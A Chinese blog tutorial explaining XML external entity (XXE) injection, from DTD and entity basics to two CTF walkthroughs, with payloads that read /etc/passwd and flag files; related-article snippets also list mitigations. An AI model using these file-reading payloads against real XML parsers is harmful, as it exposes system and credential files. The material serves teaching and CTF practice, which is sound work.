XML外部实体注入(XXE)的原理和应用

已于 2023-04-04 11:13:38 修改
阅读量5.6k 收藏 20
点赞数 3
分类专栏: Web安全 CTF 文章标签: xml 安全
于 2020-08-27 22:16:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/108269451
版权

文章目录

XXE注入

XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。

一、XML简介

XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如:

<?xml version="1.0"?> <!--XML文档定义-->
<!DOCTYPE message [ <!--定义该文档为message类型-->
<!ELEMENT message(username,password)<!-- 定义message有两个元素-->
<!ELEMENT username(#PCDATA)> <!-- 定义username元素为#PCDATA类型 -->
<!ELEMENT password(#PCDATA)>
]>

上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素,后面的XML就要像如下的方式来书写。

<message>
    <username>root</username>
    <password>123</password>
</message>

二、XML实体

上面的<!ELEMENT>中定义的是元素,也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个变量,到时候可以在XML中通过&符号来引用。

XML可分为外部实体内部实体。首先来看内部实体:
示例:

<? xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY tst "test">
]>

其中元素定义的ANY说明接受任何元素,同时定义了一个xml实体(<! ENTITY>标签),这样就可以在XML文档中这样来写

<message>
<user>&tst;</user>
</message>

外部实体
示例:

<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
    <user>&xxe;</user>
</message>

这里用 &实体名; 引用实体,在DTD中定义,在XML文档中引用。

通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开,还可以分为通用实体参数实体

1.通用实体:

用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用

示例:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]
<Profile>
 <msg>&file;</msg>
</Profile>

2.参数实体

(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用

示例:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
%an-element; %remote-dtd;

三、CTF中XEE攻击

1.题目地址:Jarvis http://web.jarvisoj.com:32794/

打开链接,输入数据后抓包:

在这里插入图片描述
发现传的是JSON数据,考虑修改一下上传文件类型为XML类型。构造外部实体,实现XXE攻击。将ContentType字段改为:application/xml,然后在请求内容中加上如下的payload:

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file///etc/passwd">
]>
<message>&shell;</message>

在这里插入图片描述
发现了/home/ctf路径。改一下file的路径:file:///home/ctf/flag.txt。即可得到flag
在这里插入图片描述

2.题目地址:https://buuoj.cn/challenges (Fake XML cookbook)
在这里插入图片描述
抓包后,发现上传的是XML类型的数据
在这里插入图片描述
直接构造XML外部实体,读flag。payload如下:

<?xml version="1.0"?>
<!DOCTYPE user[
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>passwd</password></user>

在这里插入图片描述

参考文章
https://xz.aliyun.com/t/3357
https://www.freebuf.com/vuls/175451.html

iringzh
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
XML 注入的介绍与代码防御
煜铭2011
10-07 6995
0x01 介绍 一些 Web 应用程序将 XML 文件用于各种用途,从配置到完整数据库功能。 用户输入通常会传播到这些文件中,进而定制配置或更新应用程序数据库。 如果在使用用户输入之前未清理或验证错误字符,那么这会成为安全隐患。 当未采取任何预防措施时,恶意用户可以变更配置指令,添加新用户(如果用户列表通过 XML 文件进行维护),获取更高的特权等等。 以下证明易
XML 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-23 1155
XML 注入漏洞原理以及修复方法
常见的XXE ---playload
最新发布
qq_43355651的博客
06-04 247
XXEXML External Entity)攻击是一种常见的Web安全漏洞,它允许攻击者干扰应用程序处理XML数据的方式。这些是一些常见的XXE攻击playload,但请注意,XXE攻击的有效性取决于目标应用程序的具体配置和上下文。为了保护应用程序免受XXE攻击,建议禁用外部实体的解析,并使用安全XML解析器配置。当应用程序不返回XXE注入的结果时,可以使用blind XXE攻击。文件中,可以定义一个外部实体,该实体将尝试从目标服务器获取数据并将其发送到攻击者的服务器。
XML注入学习
xujunhui222的博客
02-10 6667
一、什么是XML注入 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 简单来说xml就是用来存储数据的。 二、XML的特点 XML仅仅是纯文本,他不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构) 三、XML的定义 首先是XML声明,然后是DTD
XML 注入
发哥微课堂
06-15 8006
0x00:简介 首先先简单的说一下 xml,看一下它的全名称,叫 Xtensible Markup Language,即可扩展的标记语言,可直接理解为内容可自定义扩展,标签可自定义扩展。其实就是一个文本格式的文件,以 xml 结尾,里面的标签内容可以自定义。它具有很清晰的层次结构,便于阅读,经常被用来做配置文件和存储数据。web 中用 xml 格式来传输数据和处理的功能也有很多。而后端没有对 x...
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5300
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
基于XML注入
欢迎阅读我的博客
03-18 392
准备一个UserDao类和UserService类 , 其中 UserService类中有UserDao类型的属性 注入外部Bean(常用) 注入外部Bean的方式:在外部注册一个bean, 然后通过外部bean的id配合property标签的ref引用属性进行注入 注入内部Bean(了解) 注入内部Bean的方式:在bean标签中嵌套bean标签 , 内部bean的id是没有用的 , 不能通过容器被获取到所以不用写id set 注入的核心实现原理 set注入是基于set方法实现的,底层会通过反射机制调用属
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,如本地文件、网络...
测试XXE注入.docx
09-06
XXE 注入XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
XXE payload
黑面狐
08-16 7548
一、漏洞原理xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz即可 三、XXE payload 网上收集的payload -------------...
XMLXXE知识点
m0_63917373的博客
11-02 544
xxe XML
XXE&XML 之漏洞利用 pikachu
weixin_54431413的博客
04-23 952
一、XXEXML概念 (1)XML XML 指可扩展标记语言(EXtensible Markup Language)。 XML 是一种很像HTML的标记语言。 XML 的设计宗旨是传输数据,而不是显示数据。 (2)XXE XXE 漏洞全称 XML External Entity Injection,即 xml 外部实体注入漏洞 XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,没有进行严格的过滤,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等
XML 基础知识 && XXE 漏洞原理解析及实验(基础篇)
Jinmindong
02-16 1160
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
XMLXXE注入与CTF下的XXE
sGanYu
10-27 1739
在学习XXE漏洞之前,首先一起学习一下什么是XML XML是什么? 是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本 常见的XML结构如下: <?xml version="1.0" encoding="utf-8"?>#XML声明 <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)>&
XXE实体注入原理作用与具体操作
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 965
XXE——实体注入 原理XXE=XML External Entity 即外部实体,即外部实体,从安全角度理解成XML External Entity attack XML 外部实体注入攻击 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 当XML允许引用外部实体时,通过构造恶意XML文档,根据建站语言使用不同的协议可导致读取任意文件内容、执行系统命令、探测内网端口、访问内网网站等危害。由于站点的建站语言不同,PHP、JA
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值